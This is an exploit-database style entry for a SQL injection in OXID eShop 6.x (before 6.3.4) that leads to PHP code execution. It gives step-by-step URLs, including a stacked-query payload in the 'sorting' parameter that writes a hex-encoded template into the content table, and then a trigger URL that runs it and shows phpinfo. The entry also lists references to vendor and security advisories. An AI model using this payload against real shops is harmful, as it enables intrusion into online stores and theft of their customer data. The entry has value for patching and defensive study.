1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection # Date: 2019-07-29 # Exploit Author: VulnSpy # Vendor Homepage: https://www.oxid-esales.com/ # Software Link: https://github.com/OXID-eSales/oxideshop_ce # Version: Versions 6.x (prior to 6.3.4) # Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc # CVE: 1. Click on any product item in the web page </code><code>bash e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html </code><code> 2..Add <code>sorting</code> parameter after the URL of item detail ( Insert PHP code to database via SQL injection ) </code><code>bash e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION) VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23 </code><code> 3.Accessing the following links triggers PHP code execution and will display the PHPINFO page if exploited successfully. </code><code>bash http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo </code><code> Ref: * https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/ * https://blog.ripstech.com/2019/oxid-esales-shop-software/ * https://bugs.oxid-esales.com/view.php?id=7002 |